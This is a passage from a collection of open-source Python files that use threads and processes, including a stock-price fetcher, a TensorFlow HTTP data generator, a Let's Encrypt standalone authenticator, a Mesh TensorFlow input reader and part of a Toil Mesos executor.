on_stop(self): self.root.reading_thread_enabled = False if __name__ == '__main__': PulseSensorViewerDemoApp().run()
thread_name_and_process.py
Consider the python program given below in which we print thread name and corresponding process for each task: # Python program to illustrate the concept # of threading import threading import os def task1(): print("Task 1 assigned to thread: {}".format(threading.current_thread().name)) print("ID of process running task 1: {}".format(os.getpid())) def task2(): print("Task 2 assigned to thread: {}".format(threading.current_thread().name)) print("ID of process running task 2: {}".format(os.getpid())) if __name__ == "__main__": # print ID of current process print("ID of process running main program: {}".format(os.getpid())) # print name of main thread print("Main thread name: {}".format(threading.main_thread().name)) # creating threads t1 = threading.Thread(target=task1, name='t1') t2 = threading.Thread(target=task2, name='t2') # starting threads t1.start() t2.start() # wait until all threads finish t1.join() t2.join()
stockprice.py
#!/usr/bin/env python # -*- coding: utf-8 -*- """stockprice.py - get stock price from News sources and add to Elasticsearch. See README.md or https://github.com/shirosaidev/stocksight for more information. Copyright (C) Chris Park 2018-2019 Copyright (C) Allen (Jian Feng) Xie 2019 stocksight is released under the Apache 2.0 license. See LICENSE for the full license text. """ import sys import threading import time from random import randint from StockSight.Initializer.ElasticSearch import es from StockSight.Initializer.Logger import * from StockSight.EsMap.StockPrice import mapping from StockSight.StockPriceListener import StockPriceListener from base import Symbol, SymbolAlias, TwitterUser STOCKSIGHT_VERSION = '0.2' __version__ = STOCKSIGHT_VERSION if __name__ == '__main__': try: for symbol in Symbol.objects.values_list('name', flat=True): try: logger.info('Creating new Price index or using existing ' + symbol) es.indices.create(index=config.elasticsearch['table_prefix']['price']+symbol.lower(), body=mapping, ignore=[400, 404]) stockprice = StockPriceListener() price_thread = threading.Thread(target=stockprice.get_price,args=(symbol,)) price_thread.start() if(config.spawn_intervals['stockprice_min'] > 0): time.sleep(randint(config.spawn_intervals['stockprice_min'], config.spawn_intervals['stockprice_max'])) except Exception as e: logger.warning("%s" % e) pass # get stock price except Exception as e: logger.warning("Exception: Failed to get stock data caused by: %s" % e) except KeyboardInterrupt: print("Ctrl-c keyboard interrupt, exiting...") sys.exit(0)
http_generator.py
""" Tensor generator that yields images and labels for the image. Accepts HTTP POSTs which will enqueue data to the process queue. """ import threading import time try: # Python 3 from http.server import BaseHTTPRequestHandler, HTTPServer from socketserver import ThreadingMixIn except: # Python 2 from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer from SocketServer import ThreadingMixIn class ThreadingHTTPServer(ThreadingMixIn, HTTPServer): """ Custom HTTP server derives from ThreadingMixIn and HTTPServer. """ pass def MakePostHandler(postDataCb, queue): """ Wrapper function to compose a HTTP Handler for the POSTs. The `postDataCb` will be invoked with the POST data, this will allow the app to enqueue data to it's queue. If the `postDataCb` is not specified, then the POST data is blindly enqueued to the application queue. """ class CustomHandler(BaseHTTPRequestHandler): """ Custom HTTP handler to intercept and enqueue POST events. """ def do_POST(self): """ POST handler. """ length = int(self.headers['Content-Length']) data = self.rfile.read(length) if postDataCb: postDataCb(data) else: queue.put(data) # Respond with a 200 - OK. self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write("OK") return CustomHandler class TfHttpGenerator(): """ Generator class to wrap the server and generator for TF. """ queue = None # Opaque queue from app (fetch only) postFn = None # Post fn to invoke port = None # Server PORT # httpd = None # HTTP server instance def __init__(self, q, pfn=None, port=8080): """ Custom HTTP generator. Requires an argument which specifies the handler function to invoke which parses the JSON data and enqueues into the queue. """ self.queue = q self.postFn = pfn self.port = port def generator(self): """ generator function for the dataset. This will yield a tuple of image data and label on calls to the dataset iterator's get_next() method. """ # TODO (sabhiram) : Figure out correct time to sleep, do we need a warning? while True: if self.queue.empty(): # print("Generator empty - waiting for more POST data") time.sleep(1) while not self.queue.empty(): yield self.queue.get() def run(self): """ Run the threaded server endlessly. """ server_addr = ("", self.port) posth = MakePostHandler(self.postFn, self.queue) self.httpd = ThreadingHTTPServer(server_addr, posth) print("Server starting...") self.httpd.serve_forever() def shutdown(self): """ Shutdown the HTTP server. """ self.httpd.socket.close() self.httpd.shutdown() def run_threaded(self): """ Execute the HTTP server's handler in its own thread. """ t = threading.Thread(target=self.run) t.daemon = True t.start()
standalone.py
"""Standalone Authenticator.""" import argparse import collections import logging import socket import threading import OpenSSL import six import zope.interface from acme import challenges from acme import standalone as acme_standalone from letsencrypt import errors from letsencrypt import interfaces from letsencrypt.plugins import common from letsencrypt.plugins import util logger = logging.getLogger(__name__) class ServerManager(object): """Standalone servers manager. Manager for `ACMEServer` and `ACMETLSServer` instances. `certs` and `http_01_resources` correspond to `acme.crypto_util.SSLSocket.certs` and `acme.crypto_util.SSLSocket.http_01_resources` respectively. All created servers share the same certificates and resources, so if you're running both TLS and non-TLS instances, HTTP01 handlers will serve the same URLs! """ _Instance = collections.namedtuple("_Instance", "server thread") def __init__(self, certs, http_01_resources): self._instances = {} self.certs = certs self.http_01_resources = http_01_resources def run(self, port, challenge_type): """Run ACME server on specified ``port``. This method is idempotent, i.e. all calls with the same pair of ``(port, challenge_type)`` will reuse the same server. :param int port: Port to run the server on. :param challenge_type: Subclass of `acme.challenges.Challenge`, either `acme.challenge.HTTP01` or `acme.challenges.TLSSNI01`. :returns: Server instance. :rtype: ACMEServerMixin """ assert challenge_type in (challenges.TLSSNI01, challenges.HTTP01) if port in self._instances: return self._instances[port].server address = ("", port) try: if challenge_type is challenges.TLSSNI01: server = acme_standalone.TLSSNI01Server(address, self.certs) else: # challenges.HTTP01 server = acme_standalone.HTTP01Server( address, self.http_01_resources) except socket.error as error: raise errors.StandaloneBindError(error, port) thread = threading.Thread( # pylint: disable=no-member target=server.serve_forever) thread.start() # if port == 0, then random free port on OS is taken # pylint: disable=no-member real_port = server.socket.getsockname()[1] self._instances[real_port] = self._Instance(server, thread) return server def stop(self, port): """Stop ACME server running on the specified ``port``. :param int port: """ instance = self._instances[port] logger.debug("Stopping server at %s:%d...", *instance.server.socket.getsockname()[:2]) instance.server.shutdown() instance.thread.join() del self._instances[port] def running(self): """Return all running instances. Once the server is stopped using `stop`, it will not be returned. :returns: Mapping from ``port`` to ``server``. :rtype: tuple """ return dict((port, instance.server) for port, instance in six.iteritems(self._instances)) SUPPORTED_CHALLENGES = [challenges.TLSSNI01, challenges.HTTP01] def supported_challenges_validator(data): """Supported challenges validator for the `argparse`. It should be passed as `type` argument to `add_argument`. """ challs = data.split(",") unrecognized = [name for name in challs if name not in challenges.Challenge.TYPES] if unrecognized: raise argparse.ArgumentTypeError( "Unrecognized challenges: {0}".format(", ".join(unrecognized))) choices = set(chall.typ for chall in SUPPORTED_CHALLENGES) if not set(challs).issubset(choices): raise argparse.ArgumentTypeError( "Plugin does not support the following (valid) " "challenges: {0}".format(", ".join(set(challs) - choices))) return data class Authenticator(common.Plugin): """Standalone Authenticator. This authenticator creates its own ephemeral TCP listener on the necessary port in order to respond to incoming tls-sni-01 and http-01 challenges from the certificate authority. Therefore, it does not rely on any existing server program. """ zope.interface.implements(interfaces.IAuthenticator) zope.interface.classProvides(interfaces.IPluginFactory) description = "Automatically use a temporary webserver" def __init__(self, *args, **kwargs): super(Authenticator, self).__init__(*args, **kwargs) # one self-signed key for all tls-sni-01 certificates self.key = OpenSSL.crypto.PKey() self.key.generate_key(OpenSSL.crypto.TYPE_RSA, bits=2048) self.served = collections.defaultdict(set) # Stuff below is shared across threads (i.e. servers read # values, main thread writes). Due to the nature of CPython's # GIL, the operations are safe, c.f. # https://docs.python.org/2/faq/library.html#what-kinds-of-global-value-mutation-are-thread-safe self.certs = {} self.http_01_resources = set() self.servers = ServerManager(self.certs, self.http_01_resources) @classmethod def add_parser_arguments(cls, add): add("supported-challenges", help="Supported challenges. Preferred in the order they are listed.", type=supported_challenges_validator, default=",".join(chall.typ for chall in SUPPORTED_CHALLENGES)) @property def supported_challenges(self): """Challenges supported by this plugin.""" return [challenges.Challenge.TYPES[name] for name in self.conf("supported-challenges").split(",")] @property def _necessary_ports(self): necessary_ports = set() if challenges.HTTP01 in self.supported_challenges: necessary_ports.add(self.config.http01_port) if challenges.TLSSNI01 in self.supported_challenges: necessary_ports.add(self.config.tls_sni_01_port) return necessary_ports def more_info(self): # pylint: disable=missing-docstring return("This authenticator creates its own ephemeral TCP listener " "on the necessary port in order to respond to incoming " "tls-sni-01 and http-01 challenges from the certificate " "authority. Therefore, it does not rely on any existing " "server program.") def prepare(self): # pylint: disable=missing-docstring pass def get_chall_pref(self, domain): # pylint: disable=unused-argument,missing-docstring return self.supported_challenges def perform(self, achalls): # pylint: disable=missing-docstring if any(util.already_listening(port) for port in self._necessary_ports): raise errors.MisconfigurationError( "At least one of the (possibly) required ports is " "already taken.") try: return self.perform2(achalls) except errors.StandaloneBindError as error: display = zope.component.getUtility(interfaces.IDisplay) if error.socket_error.errno == socket.errno.EACCES: display.notification( "Could not bind TCP port {0} because you don't have " "the appropriate permissions (for example, you " "aren't running this program as " "root).".format(error.port)) elif error.socket_error.errno == socket.errno.EADDRINUSE: display.notification( "Could not bind TCP port {0} because it is already in " "use by another process on this system (such as a web " "server). Please stop the program in question and then " "try again.".format(error.port)) else: raise # XXX: How to handle unknown errors in binding? def perform2(self, achalls): """Perform achallenges without IDisplay interaction.""" responses = [] for achall in achalls: if isinstance(achall.chall, challenges.HTTP01): server = self.servers.run( self.config.http01_port, challenges.HTTP01) response, validation = achall.response_and_validation() self.http_01_resources.add( acme_standalone.HTTP01RequestHandler.HTTP01Resource( chall=achall.chall, response=response, validation=validation)) else: # tls-sni-01 server = self.servers.run( self.config.tls_sni_01_port, challenges.TLSSNI01) response, (cert, _) = achall.response_and_validation( cert_key=self.key) self.certs[response.z_domain] = (self.key, cert) self.served[server].add(achall) responses.append(response) return responses def cleanup(self, achalls): # pylint: disable=missing-docstring # reduce self.served and close servers if none challenges are served for server, server_achalls in self.served.items(): for achall in achalls: if achall in server_achalls: server_achalls.remove(achall) for port, server in six.iteritems(self.servers.running()): if not self.served[server]: self.servers.stop(port)
25_multiprocess_sharememory_unsafe.py
""" 进程间通信之共享内存 """ from multiprocessing import Process from multiprocessing import Value num = Value('i', 0) def do_sth(): global num for i in range(1000000): """ 相当于:num.value = num.value + 1 首先计算 num.value + 1 存入临时变量中 然后将临时变量的赋值给Num """ num.value += 1 t1 = Process(target=do_sth) t2 = Process(target=do_sth) t1.start() t2.start() t1.join() t2.join() print(num.value)
input_reader.py
# coding=utf-8 # Copyright 2020 The Mesh TensorFlow Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Input pipeline for MeshTensorflow. If you run MeshTensorflow models on TPUs, please use SimdMeshImplInputReader as your input pipeline. Otherwise, please use PlacementMeshImplInputReader. For SimdMeshImplInputReader, a user provides the following, and this set of APIs will handle the input pipeline for MeshTensorflow. 1. An instance of mtf.simd_mesh_impl.SimdMeshImpl. 2. A function that creates a tf.data.Dataset. The Dataset returns single examples (no batch dimension). 3. Shape (mtf.Shape) of each tensor given by tf.data.Dataset. Each of these shapes must begin with the same batch dimension. Example of usage: simd_mesh_impl = mtf.simd_mesh_impl.SimdMeshImpl(...) simd_input_reader = SimdMeshImplInputReader(simd_mesh_impl, ds_creator, mtf_input_shapes) infeed_queue = simd_input_reader.infeed_queue tpu_train_computation = tpu.replicate( computation=model_fn, inputs=[[]] * num_cores, infeed_queue=infeed_queue, ...) # In model_fn, import the input tensors using mtf.import_laid_out_tensor. def model_fn(features, labels): ... laidout_features = mtf.simd_mesh_impl.SimdMeshImpl.LaidOutTensor([features]) x = mtf.import_laid_out_tensor(mesh, laidout_features, mtf_io_shape) h = mtf.layers.dense(h, ...) ... # Start the infeed enqueue thread after you created a session: with tf.Session(...) as sess: simd_input_reader.start_infeed_thread(sess, number_steps=num_training_steps) for _ in range(num_training_steps): sess.run(tpu_train_computation) Also check out SimdMeshImplInputReader.gen_infeed_queue(). """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import threading import time import numpy as np import tensorflow.compat.v1 as tf # pylint: disable=g-direct-tensorflow-import from tensorflow.python.framework import ops from tensorflow.python.tpu import tpu_feed _NONE_PNUM = None _NO_DATA = None def _host_device_to_id(device_str): assert isinstance(device_str, str) id_string = device_str.lower().split("/task:")[1].split("/device:")[0] id_int = int(id_string) assert str(id_int) == id_string return id_int def _host_id_to_tf_device(host_id, external_worker): assert isinstance(host_id, int) if external_worker: return "/job:tpu_worker/task:{}/device:CPU:0".format(host_id) else: return "/task:{}/device:CPU:0".format(host_id) class SubBatchSlicer(object): """Reads and distributes a sub-batch on a host.""" def __init__(self, sub_batch_ds_creator, host_id, all_sub_batch_pnums, simd_mesh_impl, mtf_input_shapes, external_worker, global_batch): self._host_id = host_id self._all_sub_batch_pnums = all_sub_batch_pnums self._simd_mesh_impl = simd_mesh_impl self._mtf_input_shapes = mtf_input_shapes self._external_worker = external_worker self._global_batch = global_batch self._validate_args() with ops.device(_host_id_to_tf_device(self._host_id, self._external_worker)): self._ds_iterator = sub_batch_ds_creator().make_initializable_iterator() @property def initializer(self): return self._ds_iterator.initializer def get_slices(self): """Yields sliced tensors and which remote pnums they should go to. Yields: tf_tensor: The sliced tensor. pnum: Which process number the tf_tensor should to go. input_i: The input ordinal of the tf_tensor. """ with ops.device(_host_id_to_tf_device(self._host_id, self._external_worker)): all_input_tensors = self._ds_iterator.get_next() if isinstance(all_input_tensors, tf.Tensor): all_input_tensors = [all_input_tensors] assert len(all_input_tensors) == len(self._all_sub_batch_pnums) for input_i in range(len(all_input_tensors)): input_tensor = all_input_tensors[input_i] sub_batch_pnums = self._all_sub_batch_pnums[input_i] mtf_input_shape = self._mtf_input_shapes[input_i] # Initialize the cache for each input_i self._init_slice_cache() for pnum in sub_batch_pnums: # TODO(lehou): tf.slice is kinda slow. Use tf.split instead. input_slice = self._slice_tensor(input_tensor, mtf_input_shape, pnum) yield input_slice, pnum, input_i def _validate_args(self): assert isinstance(self._all_sub_batch_pnums, list) assert isinstance(self._mtf_input_shapes, list) assert self._all_sub_batch_pnums assert self._mtf_input_shapes assert len(self._all_sub_batch_pnums) == len(self._mtf_input_shapes) def _init_slice_cache(self): # Cache for tensor slices self._slice_dict = collections.defaultdict(list) def _slice_tensor(self, input_tensor, mtf_input_shape, pnum): """Slice input_tensor according to mtf_input_shape and pnum.""" s_begin = self._simd_mesh_impl.slice_begin(mtf_input_shape, pnum) if not self._global_batch: # Always slice from 0 in the first dimension (batch dimension), since # input_tensor a sub-batch tensor. s_begin[0] = 0 if tuple(s_begin) in self._slice_dict: return self._slice_dict[tuple(s_begin)] s_shape = self._simd_mesh_impl.slice_shape(mtf_input_shape) input_slice = tf.slice(input_tensor, s_begin, s_shape) self._slice_dict[tuple(s_begin)] = input_slice return input_slice class ProcessDevices(object): """An utility class that maps between pnum to devices.""" def __init__(self, simd_mesh_impl): """Init tpu and host devices in logical order.""" self._num_cores = simd_mesh_impl.device_assignment.num_replicas self._ordered_ordinals = [] self._ordered_tpus = [] self._ordered_hosts = [] self._ordered_host_ids = [] self._host_id_to_its_pnums = collections.defaultdict(list) d_assignment = simd_mesh_impl.device_assignment for pnum in range(self.num_cores): physical_pnum = simd_mesh_impl.l2p(pnum) # For MTF, there's always 1 core per replica. So logical_core=0. self._ordered_ordinals.append( d_assignment.tpu_ordinal(replica=physical_pnum, logical_core=0)) tpu_device = d_assignment.tpu_device(replica=physical_pnum) host_device = d_assignment.host_device(replica=physical_pnum) host_id = _host_device_to_id(host_device) self._ordered_tpus.append(tpu_device) self._ordered_hosts.append(host_device) self._ordered_host_ids.append(host_id) self._host_id_to_its_pnums[host_id].append(pnum) self._num_hosts = len(set(self._ordered_hosts)) self._num_cores_per_host = self.num_cores // self._num_hosts assert self.num_cores == self._num_hosts * self._num_cores_per_host tf.logging.info("Process Devices " "ordered_ordinals: {}, " "ordered_tpus: {}, " "ordered_hosts: {}, " "host_id_to_its_pnums: {}.".format( self.ordered_ordinals, self.ordered_tpus, self.ordered_hosts, self.host_id_to_its_pnums)) @property def ordered_ordinals(self): return self._ordered_ordinals @property def ordered_tpus(self): return self._ordered_tpus @property def ordered_hosts(self): return self._ordered_hosts @property def ordered_host_ids(self): return self._ordered_host_ids @property def host_id_to_its_pnums(self): return self._host_id_to_its_pnums @property def num_cores(self): return self._num_cores @property def num_hosts(self): return self._num_hosts @property def num_cores_per_host(self): return self._num_cores_per_host class SimdMeshImplInputReader(object): """Handles input pipeline for SimdMeshImpl.""" def __init__(self, simd_mesh_impl, ds_creator, mtf_input_shapes, ds_prefetch_size=tf.data.experimental.AUTOTUNE, external_worker=True, is_eval_mode=False): """Input pipeline for the SIMD implementation of MeshTensorflow. Args: simd_mesh_impl: A mtf.simd_mesh_impl.SimdMeshImpl object. ds_creator: A function that creates a dataset. mtf_input_shapes: A list of mtf.Shape. Then length of it must be equal to the number of elements generated by the ds_creator. NOTE, we assume: 1. The 0-th dimension is the batch dimension. 2. The batch dimension is consistent across all input shapes in mtf_input_shapes. ds_prefetch_size: The buffer size for prefetching (default tf.data.experimental.AUTOTUNE). external_worker: Whether you have an external tpu_worker or not. Set it to False if you run the program locally, for example, during local unit test. is_eval_mode: In evaluation mode, only one dataset object will be created, as opposed to one dataset for each sub-batch. Default is False. Set it to True during evaluation, to ensure that one evaluation instance will be used once and only once. Note: 1. The efficiency is optimized according to the shape of the 0-th tensor: mtf_input_shapes[0]. We recommand you to put the largest tensor as the 0-th input. 2. You need to call start_infeed_thread() before your train ops. Example: simd_mesh_impl = mtf.simd_mesh_impl.SimdMeshImpl(...) # ds_creator is function that creates a tf.data.Dataset. # This Dataset must return single examples (no batch dimension). def ds_creator(): return tf.data.Dataset.from_tensors(x) # mtf_input_shapes is a list of Shapes of all input tensors given by the # dataset. All shapes must begin with the same batch dimension. simd_input_reader = SimdMeshImplInputReader(simd_mesh_impl, ds_creator, mtf_input_shapes) batch_dim = mtf.Dimension('batch', FLAGS.batch_size) io_dim = mtf.Dimension('io', FLAGS.io_size) mtf_input_shapes = [mtf.Shape([batch_dim, io_dim])] infeed_queue = simd_input_reader.infeed_queue tpu_train_computation = tpu.replicate( computation=model_fn, inputs=[[]] * num_cores, infeed_queue=infeed_queue, ...) with tf.Session() as sess: simd_input_reader.start_infeed_thread(sess, number_steps=num_training_steps) for _ in range(num_training_steps): sess.run(tpu_train_computation) """ super(SimdMeshImplInputReader, self).__init__() assert mtf_input_shapes assert isinstance(mtf_input_shapes, list) # TODO(lehou): Support nested structures for ds_creator, mtf_input_shapes. self._simd_mesh_impl = simd_mesh_impl self._p_dev = ProcessDevices(simd_mesh_impl) self._ds_creator = ds_creator self._mtf_input_shapes = mtf_input_shapes self._ds_prefetch_size = ds_prefetch_size self._external_worker = external_worker self._is_eval_mode = is_eval_mode self._gen_infeed_queue() @property def infeed_queue(self): return self._infeed_queue def start_infeed_thread(self, sess, number_steps=-1, initial_wait_sec=0.5): """Start running enqueue ops in a thread. Args: sess: A tf.Session. number_steps: Number of times to call sess.run(enqueue_ops). default is -1 (forever). initial_wait_sec: Number of seconds to wait before starting the enqueue loop. Default is 0.5. """ def _thread_fn(): time.sleep(initial_wait_sec) if number_steps > 0: for _ in range(number_steps): sess.run(self._enqueue_ops) else: while True: sess.run(self._enqueue_ops) sess.run(self._input_initializers) self._infeed_thread = threading.Thread(target=_thread_fn) self._infeed_thread.start() def _gen_infeed_queue(self): """Generates _infeed_queue, _enqueue_ops, _input_initializers.""" pnum_maps = [] batch_size = self._mtf_input_shapes[0].to_integer_list[0] for mtf_shape in self._mtf_input_shapes: # Make sure that the batch size is the same across all input tensors. assert batch_size == mtf_shape.to_integer_list[0] pnum_maps.append(self._get_pnum_map(mtf_shape)) # For each sub-batch, we need to know which host should read it. if self._is_eval_mode: # There should be just one dataset-holding host. Make the last host do it. hosts_to_hold_ds = [self._p_dev.num_hosts - 1] else: hosts_to_hold_ds = self._get_hosts_to_hold_ds(pnum_maps[0]) sub_batch_size = batch_size // len(hosts_to_hold_ds) tf.logging.info("MTF sub_batch_size: {}".format(sub_batch_size)) assert sub_batch_size * len(hosts_to_hold_ds) == batch_size def sub_batch_ds_creator(): return self._ds_creator().batch( sub_batch_size, drop_remainder=True).prefetch( self._ds_prefetch_size) sub_batch_slicer_list = [] # For each sub-batch, create a SubBatchSlicer object. for sub_batch_i, host_id in enumerate(hosts_to_hold_ds): # Get the list of pnums for each input. if self._is_eval_mode: all_sub_batch_pnums = [ pnum_map.flatten().tolist() for pnum_map in pnum_maps] sub_batch_slicer_list.append(SubBatchSlicer(sub_batch_ds_creator, host_id, all_sub_batch_pnums, self._simd_mesh_impl, self._mtf_input_shapes, self._external_worker, global_batch=True)) else: all_sub_batch_pnums = [] for pnum_map in pnum_maps: sub_batch_pnums = pnum_map[sub_batch_i, ...].flatten().tolist() all_sub_batch_pnums.append(sub_batch_pnums) sub_batch_slicer_list.append(SubBatchSlicer(sub_batch_ds_creator, host_id, all_sub_batch_pnums, self._simd_mesh_impl, self._mtf_input_shapes, self._external_worker, global_batch=False)) # Slots for all laidout tensors. all_laidout_tensors = [[_NO_DATA] * len(self._mtf_input_shapes) \ for _ in range(self._p_dev.num_cores)] # Read tf_tensors, put them in slots. for sub_batch_slicer in sub_batch_slicer_list: for tf_tensor, pnum, input_i in sub_batch_slicer.get_slices(): all_laidout_tensors[pnum][input_i] = tf_tensor # Make sure that there are no Nones in all_laidout_tensors. for laidout_tensors in all_laidout_tensors: assert _NO_DATA not in laidout_tensors with ops.device(_host_id_to_tf_device(hosts_to_hold_ds[0], self._external_worker)): self._infeed_queue, self._enqueue_ops = self._enqueue_laidout_tensors( all_laidout_tensors) self._input_initializers = [s.initializer for s in sub_batch_slicer_list] def _get_pnum_map(self, mtf_shape): """Returns the pnum_map according to mtf_shape. Args: mtf_shape: A mtf.Shape object. Returns: A numpy array pnum_map. For the i-th sub-batch, pnum_map[i] is a numpy array containing all pnums that tensor slices of the i-th sub-batch will be send to. """ s_shape = self._simd_mesh_impl.slice_shape(mtf_shape) shape_list = [dim_size // s_dim_size for dim_size, s_dim_size in zip( mtf_shape.to_integer_list, s_shape)] pnum_map_shape = shape_list + [ self._p_dev.num_cores // np.prod(shape_list)] assert np.prod(pnum_map_shape) == self._p_dev.num_cores # Initialize the pnum_map to _NONE_PNUM. pnum_map = np.empty(pnum_map_shape, dtype=object) pnum_map[:] = _NONE_PNUM for pnum in range(self._p_dev.num_cores): s_begin = self._simd_mesh_impl.slice_begin(mtf_shape, pnum) coord = [dim_size // s_dim_size for dim_size, s_dim_size in zip( s_begin, s_shape)] # put pnum in pnum_map[coord] pnum_array_ref = pnum_map[tuple(coord)] for idx, value in enumerate(pnum_array_ref): if value is _NONE_PNUM: pnum_array_ref[idx] = pnum break tf.logging.info("MTF pnum_map: {}".format(pnum_map)) assert _NONE_PNUM not in pnum_map return pnum_map def _get_hosts_to_hold_ds(self, pnum_map): """Finds which host should read which sub-batch.""" assert _NONE_PNUM not in pnum_map # This records how many datasets (ds) are already stored on each host. num_dss_per_host = [0] * self._p_dev.num_hosts # A list of host_ids that holds datasets (ds). hosts_to_hold_ds = [] def _get_num_pnums_per_host(sub_batch_pnum_map): num_pnums_per_host = [0] * self._p_dev.num_hosts for pnum in sub_batch_pnum_map.flatten(): num_pnums_per_host[self._p_dev.ordered_host_ids[pnum]] += 1 return num_pnums_per_host def _find_host_id_with_most_pnums_and_least_ds(num_pnums_per_host, num_dss_per_host): host_metics = [( host_id, num_pnums_per_host[host_id], num_dss_per_host[host_id]) \ for host_id in range(self._p_dev.num_hosts)] # Major max key: num_pnums # Minor max key: -num_dss. We need to find a relatively spare host. host_id, _, _ = max(host_metics, key=lambda keys: (keys[1], -keys[2])) return host_id for sub_batch_pnum_map in pnum_map: num_pnums_per_host = _get_num_pnums_per_host(sub_batch_pnum_map) host_id = _find_host_id_with_most_pnums_and_least_ds(num_pnums_per_host, num_dss_per_host) num_dss_per_host[host_id] += 1 hosts_to_hold_ds.append(host_id) return hosts_to_hold_ds def _enqueue_laidout_tensors(self, all_laidout_tensors): """Generate enqueue ops to enqueue all_laidout_tensors.""" def _tpu_ordinal_function_impl(pnum): return self._p_dev.ordered_ordinals[pnum] def _placement_function_impl(pnum): return self._p_dev.ordered_hosts[pnum] laidout_tensors0 = all_laidout_tensors[0] infeed_queue = tpu_feed.InfeedQueue( number_of_tuple_elements=len(laidout_tensors0), tuple_types=[x.dtype for x in laidout_tensors0], tuple_shapes=[x.shape for x in laidout_tensors0]) enqueue_ops = infeed_queue.generate_enqueue_ops( all_laidout_tensors, tpu_ordinal_function=_tpu_ordinal_function_impl, placement_function=_placement_function_impl) return infeed_queue, enqueue_ops class PlacementMeshImplInputReader(object): """Handles input pipeline for PlacementMeshImpl.""" def __init__(self, placement_mesh_impl, ds_creator, mtf_input_shapes, ds_prefetch_size=tf.data.experimental.AUTOTUNE, is_eval_mode=False): self._placement_mesh_impl = placement_mesh_impl self._mtf_input_shapes = mtf_input_shapes batch_size = mtf_input_shapes[0].dims[0].size if is_eval_mode: ds = ds_creator().batch( batch_size, drop_remainder=False).prefetch(ds_prefetch_size) else: ds = ds_creator().batch( batch_size, drop_remainder=True).prefetch(ds_prefetch_size) self._ds_iterator = ds.make_initializable_iterator() self._input_initializers = [self._ds_iterator.initializer] def initialize(self, sess): sess.run(self._input_initializers) def gpu_placement(self, model_fn): image, label = self._ds_iterator.get_next() image_laid_out = self._placement_mesh_impl.make_slices( image, self._mtf_input_shapes[0]) label_laid_out = self._placement_mesh_impl.make_slices( label, self._mtf_input_shapes[1]) computation = model_fn(image_laid_out, label_laid_out) return computation
executor.py
# Copyright (C) 2015-2016 Regents of the University of California # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import absolute_import import os import random import socket import signal import sys import threading import pickle import logging import subprocess import traceback from time import sleep, time import psutil import mesos.interface from bd2k.util.expando import Expando from mesos.interface import mesos_pb2 import mesos.native from struct import pack from toil.batchSystems.abstractBatchSystem import BatchSystemSupport from toil.resource import Resource log = logging.getLogger(__name__) class MesosExecutor(mesos.interface.Executor): """ Part of Toil's Mesos framework, runs on a Mesos slave. A Toil job is passed to it via the task.data field, and launched via call(toil.command). """ def __init__(self): super(MesosExecutor, self).__init__() self.popenLock = threading.Lock() self.runningTasks = {} self.workerCleanupInfo = None Resource.prepareSystem() self.address = None # Setting this value at this point will ensure that the toil workflow directory will go to # the mesos sandbox if the user hasn't specified --workDir on the command line. if not os.getenv('TOIL_WORKDIR'): os.environ['TOIL_WORKDIR'] = os.getcwd() def registered(self, driver, executorInfo, frameworkInfo, slaveInfo): """ Invoked once the executor driver has been able to successfully connect with Mesos. """ log.debug("Registered with framework") self.address = socket.gethostbyname(slaveInfo.hostname) nodeInfoThread = threading.Thread(target=self._sendFrameworkMessage, args=[driver]) nodeInfoThread.daemon = True nodeInfoThread.start() def reregistered(self, driver, slaveInfo): """ Invoked when the executor re-registers with a restarted slave. """ log.debug("Re-registered") def disconnected(self, driver): """ Invoked when the executor becomes "disconnected" from the slave (e.g., the slave is being restarted due to an upgrade). """ log.critical("Disconnected from slave") def killTask(self, driver, taskId): """ Kill parent task process and all its spawned children """ # Kill any docker instances launched by current task pid, job_id = self.runningTasks[taskId] if self.workerCleanupInfo is not None: workflow_id = self.workerCleanupInfo.workflowID docker_stop_command = "docker stop `docker ps -q -f label=job_id={} -f label=workflow_id={}`".format( job_id, workflow_id) p = subprocess.Popen(docker_stop_command, shell=True) if p.wait() != 0: log.debug("Couldn't kill docker container with job_id {}, workflow_id: {}".format(job_id, workflow_id)) else: docker_rm_command = "docker rm `docker ps -q -a -f label=job_id={} -f label=workflow_id={}`".format( job_id, workflow_id) p = subprocess.Popen(docker_rm_command, shell=True) p.wait() try: pgid = os.getpgid(pid) except KeyError: pass else: os.killpg(pgid, signal.SIGKILL) def shutdown(self, driver): log.critical('Shutting down executor ...') for taskId in self.runningTasks.keys(): self.killTask(driver, taskId) Resource.cleanSystem() BatchSystemSupport.workerCleanup(self.workerCleanupInfo) log.critical('... executor shut down.') def error(self, driver, message): """ Invoked when a fatal error has occurred with the executor and/or executor driver. """ log.critical("FATAL ERROR: " + message) def _sendFrameworkMessage(self, driver): message = None while True: # The psutil documentation recommends that we ignore the value returned by the first # invocation of cpu_percent(). However, we do want to send a sign of life early after # starting (e.g. to unblock the provisioner waiting for an instance to come up) so # the first message we send omits the load info. if message is None: message = Expando(address=self.address) psutil.cpu_percent() else: message.nodeInfo = dict(coresUsed=float(psutil.cpu_percent()) * .01, memoryUsed=float(psutil.virtual_memory().percent) * .01, coresTotal=psutil.cpu_count(), memoryTotal=psutil.virtual_memory().total, workers=len(self.runningTasks)) driver.sendFrameworkMessage(repr(message)) # Prevent workers launched together from repeatedly hitting the leader at the same time sleep(random.randint(45, 75)) def launchTask(self, driver, task): """ Invoked by SchedulerDriver when a Mesos task should be launched by this executor """ def runTask(): log.debug("Running task %s", task.task_id.value) sendUpdate(mesos_pb2.TASK_RUNNING) try: taskData = pickle.loads(task.data) except: exc_info = sys.exc_info() log.error('Exception while unpickling task:', exc_info=exc_info) exc_type, exc_value, exc_trace = exc_info sendUpdate(mesos_pb2.TASK_FAILED, wallTime=None, message=''.join(traceback.format_exception_only(exc_type, exc_value))) return # 